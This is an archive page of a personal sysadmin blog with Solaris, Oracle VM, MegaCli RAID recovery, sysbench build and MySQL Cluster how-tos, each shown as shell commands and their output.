Archive for '*NIX' Category






Install the packages from the Solaris 10 installer DVD:
=======================================
– SUNWs8brandr
– SUNWs8brandu

# lofiadm -a /source/solaris10-u13_sparc.iso
# mount -F hsfs /dev/lofi/1 /mnt
# cd /mnt/Solaris_10/Product/
# pkgadd -d . SUNWs8brandr
# pkgadd -d . SUNWs8brandu
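
A quick sanity check that both brand packages landed (a simple sketch):

# pkginfo | grep SUNWs8brand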

 

Install the Solaris 8 container patch / template
=======================================
- download the Solaris 8 SPARC patch 11702874 (p11702874_800_SOLARIS64.zip)
- extract it

# unzip p11702874_800_SOLARIS64.zip
# gunzip s8containers-bundle-solaris10-sparc.tar.gz
# tar xf s8containers-bundle-solaris10-sparc.tar
# cd  s8containers-bundle/1.0.1/Product/
# pkgadd -d . SUNWs8brandk

 

Set up / install the zone

# zonecfg -z solaris8
solaris8: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:solaris8> create -t SUNWsolaris8            <--- -t=template
zonecfg:solaris8> set zonepath=/zones/solaris8
zonecfg:solaris8> set autoboot=true
zonecfg:solaris8> add net
zonecfg:solaris8:net> set address=X.X.X.X 
zonecfg:solaris8:net> set physical=e1000g1
zonecfg:solaris8:net> end
zonecfg:solaris8> verify
zonecfg:solaris8> commit
zonecfg:solaris8> exit
 
# zoneadm -z solaris8 install -u -a /path/to/extracted/patch/s8-s8zone.flar
 
# zoneadm list -cv
  ID NAME             STATUS     PATH                           BRAND    IP
   0 global           running    /                              native   shared
   - solaris8         installed  /zones/solaris8                solaris8 shared
 
# zoneadm -z solaris8 boot

 

Configure the zone via the console

# zlogin -C -e % solaris8


Trunking Infiniband

  ozzie / 01/09/2014

Trunking InfiniBand on Exalogic

Set trunk mode on the Catalyst port

catalystXX> enable
catalystXX# configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
catalystXX(config)# interface Gi0/2
catalystXX(config-if)# switchport mode trunk
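
To verify the trunk afterwards (a sketch; these IOS commands are not part of the original capture):

catalystXX(config-if)# end
catalystXX# show interfaces Gi0/2 trunk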

 

Configure VLANs on the InfiniBand switch

# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        0    0xffff
 
# createvlan 0A-ETH-1 -VLAN 193 -PKEY default
# createvlan 0A-ETH-1 -VLAN 195 -PKEY default
# showvlan 
   Connector/LAG  VLN   PKEY
   -------------  ---   ------
   0A-ETH-1        195  0xffff
   0A-ETH-1        193  0xffff
   0A-ETH-1        0    0xffff

 

Set up VNICs on the compute node

# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
 
# dladm create-vnic -l net7 -v 193 vnic0
# dladm create-vnic -l net8 -v 193 vnic1
# dladm create-vnic -l net7 -v 195 vnic2
# dladm create-vnic -l net8 -v 195 vnic3
 
# dladm show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:44:aa:9f   random            0
net0e1              net8         10000  2:8:20:58:8b:7d   random            0
vnic0               net7         10000  2:8:20:f0:60:62   random            193
vnic1               net8         10000  2:8:20:f2:c6:e    random            193
vnic2               net7         10000  2:8:20:5e:f6:63   random            195
vnic3               net8         10000  2:8:20:f9:fb:d2   random            195

 

Assign the VNICs to the Solaris containers on the compute node

# zonecfg -z solariszone1
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic0
zonecfg:solariszone1:net> end
zonecfg:solariszone1> add net
zonecfg:solariszone1:net> set physical=vnic1
zonecfg:solariszone1:net> end
zonecfg:solariszone1> verify
zonecfg:solariszone1> commit
zonecfg:solariszone1> exit
 
# zoneadm -z solariszone1 reboot
 
# zonecfg -z solariszone2
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic2
zonecfg:solariszone2:net> end
zonecfg:solariszone2> add net
zonecfg:solariszone2:net> set physical=vnic3
zonecfg:solariszone2:net> end
zonecfg:solariszone2> verify
zonecfg:solariszone2> commit
zonecfg:solariszone2> exit
 
# zoneadm -z solariszone2 reboot
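
Inside each zone (assuming exclusive-IP Solaris 11 zones), the VNIC still needs to be plumbed and addressed; a minimal sketch with a hypothetical address:

# ipadm create-ip vnic0
# ipadm create-addr -T static -a 192.168.193.10/24 vnic0/v4    <--- address is an example only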

 

Verify the VNICs on the compute node

# dladm  show-vnic
LINK                OVER         SPEED  MACADDRESS        MACADDRTYPE       VID
net0e0              net7         10000  2:8:20:48:ca:ea   random            0
net0e1              net8         10000  2:8:20:79:38:53   random            0
vnic0               net7         10000  2:8:20:f2:8e:41   random            193
solariszone1/vnic0  net7         10000  2:8:20:f2:8e:41   random            193
vnic1               net8         10000  2:8:20:be:ce:6c   random            193
solariszone1/vnic1  net8         10000  2:8:20:be:ce:6c   random            193
vnic2               net7         10000  2:8:20:3c:88:32   random            195
solariszone2/vnic2  net7         10000  2:8:20:3c:88:32   random            195
vnic3               net8         10000  2:8:20:69:fb:dc   random            195
solariszone2/vnic3  net8         10000  2:8:20:69:fb:dc   random            195


Problem:
when switching to the other node:

# clrg switch -n kambing1 kambing-rg
clrg:  (C748634) Resource group kambing-rg failed to start on chosen node and might fail over to other node(s)
 
# metaset 
# metaset -s kandang-data
metaset: kambing1: setname "kandang-data": no such set
 
# metaset -s kandang-apps
metaset: kambing1: setname "kandang-apps": no such set

Shut down kambing1 (init 0) and leave it at the ok prompt;

 

- remove kambing1 from the disksets (run from kambing2):

# metaset -s kandang-apps -d -f -h kambing1
# metaset -s kandang-data -d -f -h kambing1

* this process takes quite a while.. let it time out

 
Reboot kambing1 and re-add it from kambing2:

# metaset -s kandang-data -a -h kambing1
# metaset -s kandang-apps  -a -h kambing1

Check the metasets on kambing1, then switch the resource group between nodes;
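
For example, re-using the commands from above:

# metaset -s kandang-data
# metaset -s kandang-apps
# clrg switch -n kambing1 kambing-rg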

enjooyyy <:-p




Log in to the Oracle VM Manager server:

[root@kandangMonyet ~]# cd /u01/app/oracle/ovm-manager-3/bin
[root@kandangMonyet bin]# ./secureOvmmTcpGenKeyStore.sh 
Generate OVMM TCP over SSH key store by following steps:
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  ozzienich
What is the name of your organizational unit?
  [Unknown]:  kandang
What is the name of your organization?
  [Unknown]:  kebonbinatang.org
What is the name of your City or Locality?
  [Unknown]:  Jakarta
What is the name of your State or Province?
  [Unknown]:  DKI
What is the two-letter country code for this unit?
  [Unknown]:  ID
Is CN=ozzienich, OU=kandang, O=kebonbinatang.org, L=Jakarta, ST=DKI, C=ID correct?
  [no]:  yes
Enter key password for <ovmm>
	(RETURN if same as keystore password):
 
[root@kandangMonyet bin]# ./secureOvmmTcp.sh
Enabling OVMM TCP over SSH service
Please enter the OVM manager user name: admin
Please enter the OVM manager user password: 
Please enter the password for TCPS key store : 
The job of enabling OVMM TCPS service is committed, please restart OVMM to take effect.

Restart the OVM Manager service:

[root@kandangMonyet bin]# /sbin/service ovmm stop
[root@kandangMonyet bin]# /sbin/service ovmm start
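
To confirm the manager came back up (a sketch, assuming the stock init script):

[root@kandangMonyet bin]# /sbin/service ovmm status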

Register with Enterprise Manager Ops Center:
create a discovery profile for OVM.



Solaris 11 AI

  ozzie / 27/02/2014

Download the Solaris 11 AI ISO

# installadm create-service -s /export/home/ozzie/sol-11_1-ai-sparc.iso
Warning: Service svc:/network/dns/multicast:default is not online.
   Installation services will not be advertised via multicast DNS.
 
Creating service from: /export/home/ozzie/sol-11_1-ai-sparc.iso
OK to use subdir of /export/auto_install to store image? [y/N]: Y
Setting up the image ...
 
Creating sparc service: solaris11_1-sparc
 
Image path: /export/auto_install/solaris11_1-sparc
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
Refreshing install services
Warning: mDNS registry of service solaris11_1-sparc could not be verified.
 
Creating default-sparc alias
 
Service discovery fallback mechanism set up
Creating SPARC configuration file
No local DHCP configuration found. This service is the default
alias for all SPARC clients. If not already in place, the following should
be added to the DHCP configuration:
Boot file: http://ip-installserver:5555/cgi-bin/wanboot-cgi
 
Refreshing install services
Warning: mDNS registry of service default-sparc could not be verified.

Generate and register the system configuration profile:

# sysconfig create-profile -o /var/tmp/client_sc.xml


# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient
# installadm list -p
Service/Profile Name  Criteria
--------------------  --------
default-sparc
   sclient            None
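
The sclient profile above was created with no criteria, so it applies to every client of default-sparc. The same create-profile command can also take criteria to pin a profile to a single machine; a sketch with a hypothetical profile name, using the T5220 MAC address from the boot banner further below:

# installadm create-profile -n default-sparc -f /var/tmp/client_sc.xml -p sclient2 -c mac="00:21:28:3F:7A:C4"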

 

# installadm export -n default-sparc -m orig_default -o /var/tmp/OZ.xml
# cat /var/tmp/OZ.xml
<!DOCTYPE auto_install SYSTEM "file:///usr/share/install/ai.dtd.1">
<auto_install>
  <ai_instance name="OZ">
    <target>
      <logical>
        <zpool name="rpool" is_root="true">
          <!--
            Subsequent <filesystem> entries instruct an installer to create
            following ZFS datasets:
 
                <root_pool>/export         (mounted on /export)
                <root_pool>/export/home    (mounted on /export/home)
 
            Those datasets are part of standard environment and should be
            always created.
 
            In rare cases, if there is a need to deploy an installed system
            without these datasets, either comment out or remove <filesystem>
            entries. In such scenario, it has to be also assured that
            in case of non-interactive post-install configuration, creation
            of initial user account is disabled in related system
            configuration profile. Otherwise the installed system would fail
            to boot.
          -->
          <filesystem name="export" mountpoint="/export"/>
          <filesystem name="export/home"/>
          <be name="solaris"/>
        </zpool>
      </logical>
    </target>
    <software type="IPS">
      <destination>
        <image>
          <!-- Specify locales to install -->
          <facet set="false">facet.locale.*</facet>
          <facet set="true">facet.locale.de</facet>
          <facet set="true">facet.locale.de_DE</facet>
          <facet set="true">facet.locale.en</facet>
          <facet set="true">facet.locale.en_US</facet>
          <facet set="true">facet.locale.es</facet>
          <facet set="true">facet.locale.es_ES</facet>
          <facet set="true">facet.locale.fr</facet>
          <facet set="true">facet.locale.fr_FR</facet>
          <facet set="true">facet.locale.it</facet>
          <facet set="true">facet.locale.it_IT</facet>
          <facet set="true">facet.locale.ja</facet>
          <facet set="true">facet.locale.ja_*</facet>
          <facet set="true">facet.locale.ko</facet>
          <facet set="true">facet.locale.ko_*</facet>
          <facet set="true">facet.locale.pt</facet>
          <facet set="true">facet.locale.pt_BR</facet>
          <facet set="true">facet.locale.zh</facet>
          <facet set="true">facet.locale.zh_CN</facet>
          <facet set="true">facet.locale.zh_TW</facet>
        </image>
      </destination>
      <source>
        <publisher name="solaris">
          <origin name="http://10.10.2.12:9000"/>
        </publisher>
      </source>
      <!--
        The version specified by the "entire" package below, is
        installed from the specified IPS repository.  If another build
        is required, the build number should be appended to the
        'entire' package in the following form:
 
            <name>pkg:/entire@0.5.11-0.build#</name>
      -->
      <software_data action="install">
        <name>pkg:/entire@0.5.11-0.175.1</name>
        <name>pkg:/group/system/solaris-large-server</name>
      </software_data>
    </software>
  </ai_instance>
</auto_install>
 
# installadm create-manifest -n default-sparc -f /var/tmp/OZ.xml   -m OZ -d
# installadm list -n default-sparc  -m
Service/Manifest Name  Status   Criteria
---------------------  ------   --------
default-sparc
   client2             Default  None
   orig_default        Inactive None

 

Create a local repository

# mount -F hsfs /export/repoSolaris11/sol-11-repo-full.iso /mnt 
# rsync -aP /mnt/repo/ /export/repoSolaris11 
# pkgrepo -s /export/repoSolaris11 refresh 
# svccfg -s application/pkg/server setprop pkg/inst_root=/export/repoSolaris11 
# svccfg -s application/pkg/server setprop pkg/readonly=true 
# svccfg -s application/pkg/server setprop pkg/port=9000 
# svcadm refresh application/pkg/server 
# svcadm enable application/pkg/server
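
Point clients (and the install service) at the local repository; a sketch matching the origin used in the AI manifest above:

# pkg set-publisher -G '*' -g http://10.10.2.12:9000/ solaris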

 

Boot the client <:-p

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.d, 16256 MB memory available, Serial #XXXXXXXX
Ethernet address 0:21:28:3f:7a:c4, Host ID: XXXXXX
 
 
 
{0} ok setenv network-boot-arguments  host-ip=client-IP,router-ip=router-ip,subnet-mask=mask-value,hostname=client-name,file=wanbootCGI-URL
{0} ok boot net - install


Recovering a degraded RAID-1 virtual drive with MegaCli. First, check the virtual drive state:

# /opt/MegaRaid/LSI/MegaCli  -LDInfo -Lall -aALL
Adapter 0 -- Virtual Drive Information:
Virtual Drive: 0 (Target Id: 0)
Name                :
RAID Level          : Primary-1, Secondary-0, RAID Level Qualifier-0
Size                : 278.464 GB
Sector Size         : 512
Mirror Data         : 278.464 GB
State               : Degraded
Strip Size          : 64 KB
Number Of Drives    : 2
Span Depth          : 1
Default Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Current Cache Policy: WriteBack, ReadAheadNone, Cached, No Write Cache if Bad BBU
Default Access Policy: Read/Write
Current Access Policy: Read/Write
Disk Cache Policy   : Disk's Default
Encryption Type     : None
Is VD Cached: Yes
Cache Cade Type : Read Only
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
Adapter #0
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 6
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(bad)
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

Mark the failed drive in slot 0 as Unconfigured-Good:

# /opt/MegaRaid/LSI/MegaCli -PDMakeGood -physDrv [252:0] -a0
Adapter: 0: EnclId-252 SlotId-0 state changed to Unconfigured-Good.
 
Exit Code: 0x00

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL                           
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 7
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Unconfigured(good), Spun Up
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: Foreign 
Foreign Secure: Drive is not secured by a foreign lock key
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :26C (78.80 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
Exit Code: 0x00

 

Put the drive back into its missing slot in the array:

# /opt/MegaRaid/LSI/MegaCli -PDReplaceMissing -physDrv [252:0] -a0

 

Bring the drive online:

# /opt/MegaRaid/LSI/MegaCli -PDOnline -physDrv [252:0] -a0
 
EnclId-252 SlotId-0 state changed to OnLine.
 
Exit Code: 0x00
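
If the controller starts rebuilding the mirror at this point, progress can be watched with something like (not from the original session):

# /opt/MegaRaid/LSI/MegaCli -PDRbld -ShowProg -physDrv [252:0] -a0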

 

# /opt/MegaRaid/LSI/MegaCli  -PDList -aALL
 
Adapter #0
 
Enclosure Device ID: 252
Slot Number: 0
Drive's position: DiskGroup: 0, Span: 0, Arm: 0
Enclosure position: N/A
Device Id: 9
WWN: 5000CCA01600163F
Sequence Number: 9
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca01600163d
SAS Address(1): 0x0
Connected Port Number: 1(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C01GXN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :27C (80.60 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
 
 
 
Enclosure Device ID: 252
Slot Number: 1
Drive's position: DiskGroup: 0, Span: 0, Arm: 1
Enclosure position: N/A
Device Id: 8
WWN: 5000CCA016002EBB
Sequence Number: 2
Media Error Count: 0
Other Error Count: 0
Predictive Failure Count: 0
Last Predictive Failure Event Seq Number: 0
PD Type: SAS
 
Raw Size: 279.396 GB [0x22ecb25c Sectors]
Non Coerced Size: 278.896 GB [0x22dcb25c Sectors]
Coerced Size: 278.464 GB [0x22cee000 Sectors]
Sector Size:  0
Firmware state: Online, Spun Up
Commissioned Spare : No
Emergency Spare : No
Device Firmware Level: A31A
Shield Counter: 0
Successful diagnostics completion on :  N/A
SAS Address(0): 0x5000cca016002eb9
SAS Address(1): 0x0
Connected Port Number: 0(path0) 
Inquiry Data: HITACHI H109030SESUN300GA31A1335C033GN          
FDE Capable: Not Capable
FDE Enable: Disable
Secured: Unsecured
Locked: Unlocked
Needs EKM Attention: No
Foreign State: None 
Device Speed: 6.0Gb/s 
Link Speed: 6.0Gb/s 
Media Type: Hard Disk Device
Drive:  Not Certified
Drive Temperature :25C (77.00 F)
PI Eligibility:  No 
Drive is formatted for PI information:  No
PI: No PI
Port-0 :
Port status: Active
Port's Linkspeed: 6.0Gb/s 
Port-1 :
Port status: Active
Port's Linkspeed: Unknown 
Drive has flagged a S.M.A.R.T alert : No
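
Once the rebuild finishes, the virtual drive state should return from Degraded to Optimal; re-check with the same command used at the start:

# /opt/MegaRaid/LSI/MegaCli  -LDInfo -Lall -aALL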


Compiling sysbench @ Solaris-10 SPARC

  ozzie / 05/10/2013

A little documentation, since many people fail to install SYSBENCH on Solaris, especially on the SPARC architecture :D

The basic recipe:

 
1. make sure Solaris Studio is ready

# export PATH=$PATH:/opt/solarisstudio/bin

 
2. extract, build & install m4

# cd m4-1.4.17/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
3. update the executable search PATH

# export PATH=$PATH:/opt/app/bin

 
4. extract, build & install autoconf

# cd autoconf-2.69/
# ./configure --prefix=/opt/app
checking for a BSD-compatible install... build-aux/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... build-aux/install-sh -c -d
..
..
# make
# make install

 
5. extract, build & install automake

# cd automake-1.14
# ./configure --prefix=/opt/app
checking whether make supports nested variables... yes
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... lib/install-sh -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... lib/install-sh -c -d
..
..
# make
# make install

 
6. extract, build & install sysbench
edit the configure.ac file:

# cd sysbench-0.4.12
# vi configure.ac



Change AC_PROG_LIBTOOL to AC_PROG_RANLIB, i.e. this block:

# Checks for programs.
AC_PROG_CC
AC_PROG_LIBTOOL



becomes:

# Checks for programs.
AC_PROG_CC
AC_PROG_RANLIB


 

# ./configure  --prefix=/opt/sysbench CFLAGS=-m64
checking build system type... sparc-sun-solaris2.10
checking host system type... sparc-sun-solaris2.10
checking target system type... sparc-sun-solaris2.10
checking for a BSD-compatible install... config/install-sh -c
checking whether build environment is sane... yes
..
..
# make 
# make install

 
Now let's benchmark MySQL Enterprise OLTP. <:-p <:-p
How are the results?? :>
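
A minimal OLTP run with the freshly built sysbench 0.4.12 might look like this (a sketch; credentials and table size are placeholders):

# export PATH=$PATH:/opt/sysbench/bin
# sysbench --test=oltp --mysql-user=root --mysql-password=XXXX \
    --mysql-socket=/tmp/mysql.sock --oltp-table-size=1000000 prepare
# sysbench --test=oltp --mysql-user=root --mysql-password=XXXX \
    --mysql-socket=/tmp/mysql.sock --oltp-table-size=1000000 \
    --num-threads=16 --max-requests=10000 run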



MySQL Cluster

  ozzie / 09/07/2013

MySQL Cluster @ Solaris 10.
node1 [10.0.5.41]: NDB, SQL, Management
node2 [10.0.5.42]: NDB, SQL
node3 [10.0.5.43]: NDB, SQL


Since this is only for development, the config & datadir directory structure is placed under /apps

# ls /apps
config
ndb_data
mysql_data

# cat /apps/config/config.ini 
[TCP DEFAULT]
 
[NDB_MGMD DEFAULT]
Datadir=/apps/ndb_data/
 
[NDB_MGMD]
NodeId=1
Hostname=10.0.5.41
 
[NDBD DEFAULT]
NoOfReplicas=2
Datadir=/apps/ndb_data/
 
[NDBD]
Hostname=10.0.5.41
 
[NDBD]
Hostname=10.0.5.42
 
[NDBD]
Hostname=10.0.5.43
 
[MYSQLD]
[MYSQLD]
[MYSQLD]

# cat /apps/config/my.cnf 
[MYSQLD]
ndbcluster
ndb-connectstring=10.0.5.41
datadir=/apps/mysql_data
socket=/tmp/mysql.sock
user=mysql
 
[MYSQLD_SAFE]
log-error=/apps/mysqld.log
pid-file=/apps/mysqld.pid
 
[MYSQL_CLUSTER]
ndb-connectstring=10.0.5.41

Execute @ node1: # /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini --configdir=/apps/config/ --initial

# /opt/mysql/mysql/bin/ndb_mgmd -f /apps/config/config.ini  --configdir=/apps/config/
MySQL Cluster Management Server mysql-5.5.30 ndb-7.2.12
bash-3.2# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2 (not connected, accepting connect from 10.0.5.41)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

exec @ node1: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

# /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-09 23:58:44 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-09 23:58:44 [ndbd] INFO     -- Angel allocated nodeid: 2
 
# ndb_mgm -e show        
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, starting, Nodegroup: 0)
id=3 (not connected, accepting connect from 10.0.5.42)
id=4 (not connected, accepting connect from 10.0.5.43)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)

execute @ node2 & node3: # /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf

#  /opt/mysql/mysql/bin/ndbmtd --defaults-file=/apps/config/my.cnf 
2013-07-10 00:01:50 [ndbd] INFO     -- Angel connected to '10.0.5.41:1186'
2013-07-10 00:01:50 [ndbd] INFO     -- Angel allocated nodeid: 3

Check on the cluster management node:

# ndb_mgm
-- NDB Cluster -- Management Client --
ndb_mgm> show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5 (not connected, accepting connect from any host)
id=6 (not connected, accepting connect from any host)
id=7 (not connected, accepting connect from any host)
ndb_mgm>

Execute on all nodes:

# /opt/mysql/mysql/scripts/mysql_install_db --defaults-file=/apps/config/my.cnf \
 --user=mysql --datadir=/apps/mysql_data --basedir=/opt/mysql/mysql
 
# /opt/mysql/mysql/bin/mysqld_safe --defaults-extra-file=/apps/config/my.cnf &

# ndb_mgm -e show
Connected to Management Server at: localhost:1186
Cluster Configuration
---------------------
[ndbd(NDB)]     3 node(s)
id=2    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 0, Master)
id=3    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 1)
id=4    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12, Nodegroup: 2)
 
[ndb_mgmd(MGM)] 1 node(s)
id=1    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
 
[mysqld(API)]   3 node(s)
id=5    @10.0.5.41  (mysql-5.5.30 ndb-7.2.12)
id=6    @10.0.5.42  (mysql-5.5.30 ndb-7.2.12)
id=7    @10.0.5.43  (mysql-5.5.30 ndb-7.2.12)

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
